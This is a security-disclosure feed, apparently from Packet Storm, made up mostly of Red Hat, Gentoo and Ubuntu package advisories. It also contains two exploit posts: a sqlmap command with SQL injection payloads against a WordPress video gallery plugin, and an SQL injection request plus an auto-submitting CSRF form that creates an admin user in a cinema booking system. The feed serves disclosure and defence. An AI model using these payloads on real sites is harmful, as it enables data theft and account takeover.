Red Hat Security Advisory 2024-4353-03 - An update for the nodejs:16 package is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4353.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: nodejs:16 security updateAdvisory ID:        RHSA-2024:4353-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4353Issue date:         2024-07-08Revision:           03CVE Names:          CVE-2024-27983====================================================================Summary: An update for the nodejs:16 package is now available for Red Hat EnterpriseLinux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:Node.js is a software development platform for building fast and scalablenetwork applications in the JavaScript programming language.Security Fix(es):* nodejs/16: CONTINUATION frames DoS (CVE-2024-27983)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-27983References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2272764

Red Hat Security Advisory 2024-4353-03

Red Hat Security Advisory 2024-4352-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include double free, memory leak, null pointer, spoofing, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4352.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:4352-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4352  
Issue date:         2024-07-08  
Revision:           03  
CVE Names:          CVE-2020-26555  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

[Updated 03 July 2024]

The text of this advisory has been updated with the correct product name (Red  
Hat Enterprise Linux 8) in the Topics section. In the Problem Description  
section, CVEs of the same sub-components have been grouped together. The  
packages included in this revised update have not been changed in any way from  
the packages included in the original advisory.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: tls (CVE-2024-26585,CVE-2024-26584, CVE-2024-26583

* kernel-rt: kernel: PCI interrupt mapping cause oops [rhel-8] (CVE-2021-46909)

* kernel: ipc/mqueue, msg, sem: avoid relying on a stack reference past its expiry (CVE-2021-47069)

* kernel: hwrng: core - Fix page fault dead lock on mmap-ed hwrng (CVE-2023-52615)

* kernel-rt: kernel: drm/amdgpu: use-after-free vulnerability (CVE-2024-26656)

* kernel: Bluetooth: Avoid potential use-after-free in hci_error_reset CVE-2024-26801)

* kernel: Squashfs: check the inode number is not the invalid value of zero  (CVE-2024-26982)

* kernel: netfilter: nf_tables: use timestamp to check for set element timeout (CVE-2024-27397)

* kernel: wifi: mac80211: (CVE-2024-35789, CVE-2024-35838, CVE-2024-35845)

* kernel: wifi: nl80211: reject iftype change with mesh ID change (CVE-2024-27410)

* kernel: perf/core: Bail out early if the request AUX area is out of bound (CVE-2023-52835)

* kernel:TCP-spoofed ghost ACKs and leak initial sequence number (CVE-2023-52881)

* kernel: Bluetooth BR/EDR PIN Pairing procedure is vulnerable to an impersonation attack (CVE-2020-26555)

* kernel: ovl: fix leaked dentry (CVE-2021-46972)

* kernel: platform/x86: dell-smbios-wmi: Fix oops on rmmod dell_smbios (CVE-2021-47073)

* kernel: mm/damon/vaddr-test: memory leak in damon_do_test_apply_three_regions() (CVE-2023-52560)

* kernel: ppp_async: limit MRU to 64K (CVE-2024-26675)

* kernel: mm/swap: fix race when skipping swapcache (CVE-2024-26759)

* kernel: RDMA/mlx5: Fix fortify source warning while accessing Eth segment (CVE-2024-26907)

* kernel: x86/mm: Disallow vsyscall page read for copy_from_kernel_nofault() (CVE-2024-26906)

* kernel: net: ip_tunnel: prevent perpetual headroom growth (CVE-2024-26804)

* kernel: net/usb: kalmia: avoid printing uninitialized value on error path (CVE-2023-52703)

* kernel: KVM: SVM: improper check in svm_set_x2apic_msr_interception allows direct access to host x2apic msrs (CVE-2023-5090)

* kernel: EDAC/thunderx: Incorrect buffer size in drivers/edac/thunderx_edac.c (CVE-2023-52464)

* kernel: ipv6: sr: fix possible use-after-free and null-ptr-deref (CVE-2024-26735)

* kernel: mptcp: fix data re-injection from stale subflow (CVE-2024-26826)

* kernel: net/bnx2x: Prevent access to a freed page in page_pool (CVE-2024-26859)

* kernel: crypto: (CVE-2024-26974, CVE-2023-52813)

* kernel: can: (CVE-2023-52878, CVE-2021-47456)

* kernel: usb: (CVE-2023-52781, CVE-2023-52877)

* kernel: net/mlx5e: fix a potential double-free in fs_any_create_groups (CVE-2023-52667)

* kernel: usbnet: sanity check for maxpacket (CVE-2021-47495)

* kernel: gro: fix ownership transfer (CVE-2024-35890)

* kernel: erspan: make sure erspan_base_hdr is present in skb->head (CVE-2024-35888)

* kernel: tipc: fix kernel warning when sending SYN message (CVE-2023-52700)

* kernel: net/mlx5/mlxsw: (CVE-2024-35960, CVE-2024-36007, CVE-2024-35855)

* kernel: net/mlx5e: (CVE-2024-35959, CVE-2023-52626, CVE-2024-35835)

* kernel: mlxsw: (CVE-2024-35854, CVE-2024-35853, CVE-2024-35852)

* kernel: net: (CVE-2024-35958, CVE-2021-47311, CVE-2021-47236, CVE-2021-47310)

* kernel: i40e: Do not use WQ_MEM_RECLAIM flag for workqueue (CVE-2024-36004)

* kernel: mISDN: fix possible use-after-free in HFC_cleanup() (CVE-2021-47356)

* kernel: udf: Fix NULL pointer dereference in udf_symlink function (CVE-2021-47353)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-40882)

* [rhel8.9][cxgb4]BUG: using smp_processor_id() in preemptible [00000000] code: ethtool/54735 (JIRA:RHEL-8779)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-26555

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1918601  
https://bugzilla.redhat.com/show_bug.cgi?id=2248122  
https://bugzilla.redhat.com/show_bug.cgi?id=2258875  
https://bugzilla.redhat.com/show_bug.cgi?id=2265517  
https://bugzilla.redhat.com/show_bug.cgi?id=2265519  
https://bugzilla.redhat.com/show_bug.cgi?id=2265520  
https://bugzilla.redhat.com/show_bug.cgi?id=2265800  
https://bugzilla.redhat.com/show_bug.cgi?id=2266408  
https://bugzilla.redhat.com/show_bug.cgi?id=2266831  
https://bugzilla.redhat.com/show_bug.cgi?id=2267513  
https://bugzilla.redhat.com/show_bug.cgi?id=2267518  
https://bugzilla.redhat.com/show_bug.cgi?id=2267730  
https://bugzilla.redhat.com/show_bug.cgi?id=2270093  
https://bugzilla.redhat.com/show_bug.cgi?id=2271680  
https://bugzilla.redhat.com/show_bug.cgi?id=2272692  
https://bugzilla.redhat.com/show_bug.cgi?id=2272829  
https://bugzilla.redhat.com/show_bug.cgi?id=2273204  
https://bugzilla.redhat.com/show_bug.cgi?id=2273278  
https://bugzilla.redhat.com/show_bug.cgi?id=2273423  
https://bugzilla.redhat.com/show_bug.cgi?id=2273429  
https://bugzilla.redhat.com/show_bug.cgi?id=2275604  
https://bugzilla.redhat.com/show_bug.cgi?id=2275633  
https://bugzilla.redhat.com/show_bug.cgi?id=2275635  
https://bugzilla.redhat.com/show_bug.cgi?id=2275733  
https://bugzilla.redhat.com/show_bug.cgi?id=2278337  
https://bugzilla.redhat.com/show_bug.cgi?id=2278354  
https://bugzilla.redhat.com/show_bug.cgi?id=2280434  
https://bugzilla.redhat.com/show_bug.cgi?id=2281057  
https://bugzilla.redhat.com/show_bug.cgi?id=2281113  
https://bugzilla.redhat.com/show_bug.cgi?id=2281157  
https://bugzilla.redhat.com/show_bug.cgi?id=2281165  
https://bugzilla.redhat.com/show_bug.cgi?id=2281251  
https://bugzilla.redhat.com/show_bug.cgi?id=2281253  
https://bugzilla.redhat.com/show_bug.cgi?id=2281255  
https://bugzilla.redhat.com/show_bug.cgi?id=2281257  
https://bugzilla.redhat.com/show_bug.cgi?id=2281272  
https://bugzilla.redhat.com/show_bug.cgi?id=2281350  
https://bugzilla.redhat.com/show_bug.cgi?id=2281689  
https://bugzilla.redhat.com/show_bug.cgi?id=2281693  
https://bugzilla.redhat.com/show_bug.cgi?id=2281920  
https://bugzilla.redhat.com/show_bug.cgi?id=2281923  
https://bugzilla.redhat.com/show_bug.cgi?id=2281925  
https://bugzilla.redhat.com/show_bug.cgi?id=2281953  
https://bugzilla.redhat.com/show_bug.cgi?id=2281986  
https://bugzilla.redhat.com/show_bug.cgi?id=2282394  
https://bugzilla.redhat.com/show_bug.cgi?id=2282400  
https://bugzilla.redhat.com/show_bug.cgi?id=2282471  
https://bugzilla.redhat.com/show_bug.cgi?id=2282472  
https://bugzilla.redhat.com/show_bug.cgi?id=2282581  
https://bugzilla.redhat.com/show_bug.cgi?id=2282609  
https://bugzilla.redhat.com/show_bug.cgi?id=2282612  
https://bugzilla.redhat.com/show_bug.cgi?id=2282653  
https://bugzilla.redhat.com/show_bug.cgi?id=2282680  
https://bugzilla.redhat.com/show_bug.cgi?id=2282698  
https://bugzilla.redhat.com/show_bug.cgi?id=2282712  
https://bugzilla.redhat.com/show_bug.cgi?id=2282735  
https://bugzilla.redhat.com/show_bug.cgi?id=2282902  
https://bugzilla.redhat.com/show_bug.cgi?id=2282920

Red Hat Security Advisory 2024-4352-03

Red Hat Security Advisory 2024-4351-03 - An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4351.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: virt:rhel and virt-devel:rhel security and bug fix update  
Advisory ID:        RHSA-2024:4351-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4351  
Issue date:         2024-07-08  
Revision:           03  
CVE Names:          CVE-2024-4418  
====================================================================

Summary: 

An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Description:

Kernel-based Virtual Machine (KVM) offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems.

Security Fix:

* virt:rhel/libvirt: stack use-after-free in virNetClientIOEventLoop (CVE-2024-4418) 

Bug fix:

* virsh destroy with --graceful destroyed a paused guest (qemu process paused by SIGSTOP) (JIRA:RHEL-36064)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-4418

References:

https://access.redhat.com/security/updates/classification/#low  
https://bugzilla.redhat.com/show_bug.cgi?id=2278616  
https://issues.redhat.com/browse/RHEL-36064

Red Hat Security Advisory 2024-4351-03

WordPress Video Gallery - YouTube Gallery And Vimeo Gallery version 2.3.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection # Date: 2024-07-05# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://total-soft.com/wp-video-gallery/# Version 2.3.61. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `TS Video Gallery  > `Create ` > ` Use Theme` and save it.     ```2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc3. Search for orderby parameter.## SQLMAP COMMANDpython3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \wordpress_test_cookie=WP Cookie check; \wp-settings-time-1=1720173805" --thread 10 ## RESULTsqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:---Parameter: orderby (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[08:37:45] [INFO] the back-end DBMS is MySQL[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))web application technology: Apache 2.4.54, PHP 8.0.23back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

WordPress Video Gallery - YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection

Cinema Booking System version 1.0 suffers from remote SQL injection and cross site request forgery vulnerabilities.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > Cinema Booking System - Multiple Vulnerabilities.:. Google Dorks .:.intitle:Cinema Booking System.:. Date: July 5, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://www.phpjabbers.com/.:. Product -> https://www.phpjabbers.com/cinema-booking-system/.:. Product Version -> 1.0.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ##################### |PRODUCT DESCRIPTION| #####################"The Cinema Booking System is a PHP/MySQL-based seat and ticket reservation system allowing bookings in a few easy steps. Users can process online payments, manage reservations, and customize events. This powerful cinema ticket booking system can be deployed on any website offering tickets for movies, theater, and other scheduled performances. If you purchase the booking script with a Developer License, you will be able to make your own changes to the PHP source code."Vulnerability 1: Authenticated SQL InjectionGET http://localhost/index.php?controller=pjAdminBookings&action=pjActionGetBooking&column=%27&direction=DESC&page=0&rowCount=10&uuid=%27&c_name=&from_price=&to_price=&c_email=&event_id= HTTP/1.1host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestConnection: keep-aliveReferer: http://localhost/index.php?controller=pjAdminBookings&action=pjActionIndexCookie: CinemaBooking=8e2ffd6bba921f964458b47fb27eb952Priority: u=1Response:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' DESCLIMIT 0, 10' at line 5===========================================================================================Vulnerability 2: Cross Site Request ForgeryRisk:Privilege EscalationProof of concept:<h1>CSRF PoC</h1>    <form id="csrfForm" action="http://localhost/index.php?controller=pjAdminUsers&action=pjActionCreate" method="POST">        <input type="hidden" name="user_create" value="1">        <input type="hidden" name="role_id" value="1">        <input type="hidden" name="email" value="test@test.com">        <input type="hidden" name="password" value="123123">        <input type="hidden" name="name" value="test">        <input type="hidden" name="phone" value="">        <input type="hidden" name="status" value="T">    </form>    <script type="text/javascript">        document.getElementById('csrfForm').submit();    </script></body></html>

Cinema Booking System 1.0 SQL Injection / Cross Site Request Forgery

Gentoo Linux Security Advisory 202407-17 - Multiple vulnerabilities have been discovered in BusyBox, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.34.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: BusyBox: Multiple Vulnerabilities  
     Date: July 05, 2024  
     Bugs: #824222  
       ID: 202407-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in BusyBox, the worst of  
which could lead to arbitrary code execution.

Background  
==========

BusyBox is set of tools for embedded systems and is a replacement for  
GNU Coreutils.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
sys-apps/busybox  < 1.34.0      >= 1.34.0

Description  
===========

Multiple vulnerabilities have been discovered in BusyBox. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All BusyBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/busybox-1.34.0"

References  
==========

[ 1 ] CVE-2021-42373  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42373  
[ 2 ] CVE-2021-42374  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42374  
[ 3 ] CVE-2021-42375  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42375  
[ 4 ] CVE-2021-42376  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42376  
[ 5 ] CVE-2021-42377  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42377  
[ 6 ] CVE-2021-42378  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42378  
[ 7 ] CVE-2021-42379  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42379  
[ 8 ] CVE-2021-42380  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42380  
[ 9 ] CVE-2021-42381  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42381  
[ 10 ] CVE-2021-42382  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42382  
[ 11 ] CVE-2021-42383  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42383  
[ 12 ] CVE-2021-42384  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42384  
[ 13 ] CVE-2021-42385  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42385  
[ 14 ] CVE-2021-42386  
      https://nvd.nist.gov/vuln/detail/CVE-2021-42386

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-17

Gentoo Linux Security Advisory 202407-16 - A vulnerability has been discovered in Coreutils, which can lead to a heap buffer overflow and possibly arbitrary code execution. Versions greater than or equal to 9.4-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Coreutils: Buffer Overflow Vulnerability  
     Date: July 05, 2024  
     Bugs: #922474  
       ID: 202407-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Coreutils, which can lead to a  
heap buffer overflow and possibly aribitrary code execution.

Background  
==========

The GNU Core Utilities are the basic file, shell and text manipulation  
utilities of the GNU operating system.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
sys-apps/coreutils  < 9.4-r1      >= 9.4-r1

Description  
===========

A vulnerability has been discovered in the Coreutils "split" program  
that can lead to a heap buffer overflow and possibly arbitrary code  
execution.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Coreutils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/coreutils-9.4-r1"

References  
==========

[ 1 ] CVE-2024-0684  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0684

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-16

Ubuntu Security Notice 6879-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6879-1July 04, 2024virtuoso-opensource vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Virtuoso Open-Source Edition could be made to crash if it receivedspecially crafted input.Software Description:- virtuoso-opensource: high-performance databaseDetails:Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.(CVE-2023-31620, CVE-2023-31622, CVE-2023-31624, CVE-2023-31626,CVE-2023-31627, CVE-2023-31629, CVE-2023-31630, CVE-2023-31631,CVE-2023-48951)Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectlyhandled certain crafted SQL statements. An attacker could possibly usethis issue to crash the program, resulting in a denial of service.This issue only affects Ubuntu 22.04 LTS and Ubuntu 24.04 LTS.(CVE-2023-48945, CVE-2023-48946, CVE-2023-48947, CVE-2023-48950)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.8ubuntu0.1~esm2                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.8ubuntu0.1~esm2                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.8ubuntu0.1~esm2                                   Available with Ubuntu ProUbuntu 22.04 LTS   virtuoso-opensource             7.2.5.1+dfsg1-0.2ubuntu0.1~esm2                                   Available with Ubuntu Pro   virtuoso-opensource-7           7.2.5.1+dfsg1-0.2ubuntu0.1~esm2                                   Available with Ubuntu Pro   virtuoso-opensource-7-bin       7.2.5.1+dfsg1-0.2ubuntu0.1~esm2                                   Available with Ubuntu ProUbuntu 20.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu10+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu10+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu10+esm2                                   Available with Ubuntu ProUbuntu 18.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu9+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu9+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu9+esm2                                   Available with Ubuntu ProUbuntu 16.04 LTS   virtuoso-opensource             6.1.6+repack-0ubuntu5+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1         6.1.6+repack-0ubuntu5+esm2                                   Available with Ubuntu Pro   virtuoso-opensource-6.1-bin     6.1.6+repack-0ubuntu5+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6879-1   CVE-2023-31620, CVE-2023-31622, CVE-2023-31624, CVE-2023-31626,   CVE-2023-31627, CVE-2023-31629, CVE-2023-31630, CVE-2023-31631,   CVE-2023-48945, CVE-2023-48946, CVE-2023-48947, CVE-2023-48950,   CVE-2023-48951

Ubuntu Security Notice USN-6879-1

Ubuntu Security Notice 6873-2 - It was discovered that the Intel Data Streaming and Intel Analytics Accelerator drivers in the Linux kernel allowed direct access to the devices for unprivileged users and virtual machines. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6873-2July 04, 2024linux-starfive-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-starfive-6.5: Linux kernel for StarFive processorsDetails:It was discovered that the Intel Data Streaming and Intel AnalyticsAccelerator drivers in the Linux kernel allowed direct access to thedevices for unprivileged users and virtual machines. A local attacker coulduse this to cause a denial of service. (CVE-2024-21823)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystem:   - Netfilter;(CVE-2024-26643, CVE-2024-26925, CVE-2024-26924, CVE-2024-26809)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-6.5.0-1016-starfive  6.5.0-1016.17~22.04.1   linux-image-starfive            6.5.0.1016.17~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6873-2   https://ubuntu.com/security/notices/USN-6873-1   CVE-2024-21823, CVE-2024-26643, CVE-2024-26809, CVE-2024-26924,   CVE-2024-26925Package Information: https://launchpad.net/ubuntu/+source/linux-starfive-6.5/6.5.0-1016.17~22.04.1

Ubuntu Security Notice USN-6873-2

Gentoo Linux Security Advisory 202407-15 - Multiple vulnerabilities have been discovered in GraphicsMagick, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 1.3.40 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: GraphicsMagick: Multiple Vulnerabilities  
     Date: July 05, 2024  
     Bugs: #888545, #890851  
       ID: 202407-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GraphicsMagick, the  
worst of which could lead to arbitrary code execution.

Background  
==========

GraphicsMagick is a collection of tools and libraries which support  
reading, writing, and manipulating images in many major formats.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
media-gfx/graphicsmagick  < 1.3.40      >= 1.3.40

Description  
===========

Multiple vulnerabilities have been discovered in GraphicsMagick. Please  
review the CVE identifiers referenced below for details.

Impact  
======

